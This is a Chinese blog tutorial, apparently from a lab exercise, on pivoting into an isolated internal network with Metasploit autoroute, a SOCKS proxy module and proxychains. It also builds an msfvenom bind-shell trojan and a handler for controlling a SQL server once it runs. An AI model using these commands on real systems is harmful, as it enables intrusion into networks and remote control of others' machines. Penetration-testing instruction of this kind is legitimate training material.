kali环境下msf+proxychains构造代理通讯链实现不出网主机通讯

最新推荐文章于 2025-03-22 02:15:00 发布
最新推荐文章于 2025-03-22 02:15:00 发布
阅读量867 收藏 8
点赞数 31
分类专栏: 渗透测试 # 内网渗透 文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_79590880/article/details/143803530
版权

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-优快云博客

本文整理在linux系统下,利用msf配合代理转发工具proxychains实现访问不出网主机

实验环境与构架

本次实验目的利用代理通讯链让kali攻击服务器能直接访问管理员win7系统。

实现原理:

利用一个主机多个网卡的特性,即沦陷一台主机就能利用这台主机访问本不应在外网可访问到的主机,这个就是我们访问内网不可达主机的原理。

实验开始

初期外网渗透结束位置

内网主机群体防火墙关闭

我们跳过外网web渗透直接从上线web服务器开始操作。

现在这个小内网我们当前攻击进度如下:

接下来我们的目的就是能够让我们kali中的工具能直接访问sql服务器,进行下面部分的攻击。

配置代理通讯sql服务器

现在我们知道了我们拥有了web服务器的权限。

现在我们就需要查看这个服务器的路由,看看web服务器有哪几个网卡。

能够访问哪几个网段。

run autoroute -p
第一次使用未开启模块需要输入下面这个

run post/multi/manage/autoroute

现在我们得知,当前文件有128和152两个网段的网卡。

再执行一遍,可查看

run autoroute -p

现在需要我们在对方主机上开启socket协议

用来转发流量,或者去正向上线木马。

首先我们要暂时退出控制session的命令行。

然后使用auxiliary/server/socks_proxy模块

background

use auxiliary/server/socks_proxy

使用模块后可以用

show options

来查看可配置的选项

我们可以选择使用socket5或者4a版本,以及开放协议的端口号。

如果是5的话可以配置账号密码。

这里随便设置一个8848端口。

然后run即可。

现在就会在web机器上开启socket协议。

现在我们要配置proxychains

(kali中自带了这个东西,但是如果是其他的linux的服务器,需要自己下载)

他有一个配置文件(操作有点像改hosts文件)

在etc目录下有这个文件

打开后最底下

像添加hosts规则一样把协议,ip跟端口写在这里。

我的环境中我们需要添加的是

socks5  127.0.0.1 8848

然后我们使用代理的命令只要前面加一个proxychains4即可。

现在我们直接尝试nmap扫描sql服务器192.168.152.131即可

这里直接nmap无法扫描,原因是nmap会用到一些ping等协议,这些底层的socket做不了,所以出问题。

现在我们就能通讯sql服务器了。

正向拿下sql服务器权限

现在假设我们拿下sql权限。

生成正向后门。

msfvenom -p windows/meterpreter/bind_tcp LPORT=8849 -f exe -o sql.exe

正向后门是我们找对方,所以需要先运行木马,在进行监听

现在对方点击了木马

设置监听

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost [目标ip]
set lport [己方端口]
run

返回界面之后可以用

sessions和jobs分别查看session和代理的设置

之后感染内网的其他计算机就是上面的相同规则。

最新kaliproxychains4
vanony的博客
01-23 2772
描述: 通过代理服务器重定向连接。 该程序强制任何给定的tcp客户端建立的任何tcp连接都遵循代理(或代理)。 它是一种代理。 它的作用类似于sockscap / premeo / eborder驱动程序(拦截TCP调用)。 此版本(v4)支持SOCKS4,SOCKS5和HTTP CONNECT代理服务器。 身份验证类型:socks - "user/pass" , http - "basic". 什么时候使用它? 1. 从局域获取“外部”的唯一方法是通过代理服务器。 2. 当您位于限制性防火墙后面时,
渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内服务器权限
lza20001103的博客
09-04 2349
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内服务器权限 文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内渗透过程中都会遇到,进入内后,无法访问内页面的情况,这是我们就需要配置路由信息,访问内页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内
msf+proxychains组合搭建socks5隧道 | 内穿透
ULGANOY的博客
08-19 982
socks5隧道 | 内穿透技术学习
linux-kaliproxychains4 设置终端及浏览器代理(详细步骤)
weixin_48915167的博客
03-14 1万+
kali版本2024.1,虚拟机版本vmware workstation pro 17, 由于工作中需要使终端和浏览器能科学上代理,查询资料后发现,常规步骤是使用系统自带的proxychains
渗透 「MSF与CS实战:Socks代理(4与5的区别)与内穿透技术的深度解析与应用」msf+路由++搭理+profile = 穿透OR探测 (已更新)
最新发布
浩策盾悟
03-22 6546
路由地址路由地址是网络中用于数据包转发的路径标识,由路由器根据路由表决定数据包从源地址到目标地址的下一跳。在网络通信中,路由地址确保数据能够准确到达目标主机。Socks5代理Socks5是一种网络协议,支持客户端通过代理服务器与目标服务器通信。它支持TCP和UDP流量,提供认证功能,常用于隐藏真实IP地址或绕过网络限制(如防火墙)。内代理代理是指在局域(LAN)内部署的代理服务器,用于管理内用户对外部网络的访问,或在渗透测试中将内流量转发到其他网络(如通过被控主机)。
Kali 中通过 Proxychains 设置 代理实现IP防封测试
qq_38431115的博客
10-18 1385
Tor 会将您的流量通过 Tor 网络内的三个随机的服务器(也称节点)发送。由于强大的匿名特性,Tor 被用于 spam 甚至不法用途,不少站将 Tor 节点的 IP 列入了黑名单,对来自 Tor 的访问进行限制或禁止。后输入 ./start-tor-browser.desktop --register-app 将 Tor 浏览器创建为桌面程序。,因此目标站方只知道用户使用了代理,对用户使用 Tor 并不知情,因而可以改善对 Tor 不友好站的访问体验。连接到 Tor 后,用户还可以前往。
kaliproxychains代理配置:
weixin_68281676的博客
06-27 4985
kali系统root权限下 vi /etc/proxychains.conf #各配置项用法如下:(把下面两个#去掉) #dynamic_chain: #每个连接都将通过代理完成 #所有代理按列表中显示的顺序接 #至少有一个代理必须在线才能使用 #(跳过死的代理) #strict_chain: 该配置为ProxyChains的默认配置,同dynamic_chain一样, 但所有代理必须正常,否则不能正常使用 5、在底行输入 socks5 127...
kali中自带有代理proxychains
xxx9686的博客
09-15 789
配置文件路径为:/etc/proxychains.conf,将文件拉倒最底部。proxychains运行方法: proxychains + 程序。我们使用whatweb来探测内信息,所以修改好之后执行为。kali中默认自带有代理工具为:proxychains。修改好之后直接运行proxychains即可。
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
qq_46258964的博客
07-01 2660
MSF后渗透的一些操作 端口转发 添加路由,横向渗透(跨段攻击) 利用arp扫描内主机 Socks代理篇 新版的msf和老版的不一样,代理模块也不一样。 auxiliary/server/socks_proxy 配置proxychains代理软件去连接建立好的socks隧道,便可以成功访问内proxychains+nmap扫描主机是否存在漏洞 proxychains使用msf框架...
代理穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7870
代理面试常问一.概述代理的本质是socks协议
kali内置超好用的代理工具proxychains
Eason_LYC安全白帽子的成长博客
03-21 1万+
Kali Linux是一个流行的安全测试和渗透测试操作系统,而ProxyChains是其中一个非常有用的工具,它可以帮助用户在渗透测试期间隐藏其真实IP地址,以便更好地保护他们的匿名性和隐私。具体来说,ProxyChains是一个开源工具,它允许用户通过一个或多个代理服务器来路由TCP或UDP连接,从而隐藏其真实IP地址。该工具可以用于在不被发现的情况下执行各种网络操作,例如扫描和攻击,而无需揭示用户的位置和身份。
Windows和Kali上使用proxychains代理流量
MrTreebook的博客
05-23 4166
PS. 写这篇文章前要给大家说一个小知识:VPN和流量代理在本质上是不一样的,最近在上看很多攻略,似乎都把VPN和流量代理说成了一回事。大部分人只是为了科学上而混淆了这两个概念,导致真正需要VPN的人得不到真正的帮助。本文仅仅是分享一下在Windows和Linux(Debian)上怎么进行流量代理。我自己需要进程流量代理的一个比较重要的原因是有时候系统代理会出现问题,不得不采用进程流量代理的模式。而clash的TUN模式似乎在我这里也不起作用,本人也不想买软路由,实在是有一丢丢贵。
proxychains4】虚拟机内kali主机代理
记录学习,一起进步
06-27 8198
proxychains4】虚拟机内kali主机代理
Kali proxychains
Make
07-24 6230
1.什么是proxychains   在linux系统中有很多软件是不支持代理的,但是proxychains 却可以让不支持代理的软件   也能走代理通道,支持HTTP,HTTPS,SOCKS4,SOCKS5,等多种代理协议,而且还能配置代理   (可以理解成多重代理),可以说是安全渗透的神器! 2.什么是“强加密”代理、   “强加密”代理指的是使用的一重代理,二重代理,多重代理中有...
PROXYCHAINSKali Linux 上配置NAT PROXYCHAINS保姆级教程
热门推荐
weixin_63958646的博客
05-20 11万+
在博主配置kali 的时候遇到了一些小问题,主要就是连接一直报错超时。
proxychains 设置kali代理
FuYuDong2的博客
08-03 908
ip地址为主机ip地址, 端口号为clash开放的端口,记得clash的Allow LAN 要打开。Kali 虚拟机,windows主机,clash代理, 主机kali使用NAT 模式。kali自带proxychains。ping 命令无法使用该代理,因为。命令来访问google。
Kali-linux设置ProxyChains
2301_77162959的博客
05-09 2706
ProxyChainsLinux和其他Unices下的代理工具。它可以使任何程序通过代理,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4和SOCKS5类型的代理服务器,并且可配置多个代理ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序,直接断开接收方和发送方的连接。本节将介绍设置ProxyChains的方法。
kali怎么通过proxychains使用主机代理
04-23
可以使用以下步骤: 1. 打开终端并输入命令:sudo apt-get install proxychains。 2. 打开proxychains的配置文件,在终端中输入命令:sudo nano /etc/proxychains.conf。 3. 找到最后一行并将其取消注释,然后在行末添加主机地址和端口号,例如:socks5 127.0.0.1 1080。 4. 在proxychains前面加上要使用它的命令,并按Enter键。例如:proxychains nmap -sS scanme.nmap.org。 现在,您可以使用proxychainskali连接到主机代理
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北岭敲键盘的荒漠猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值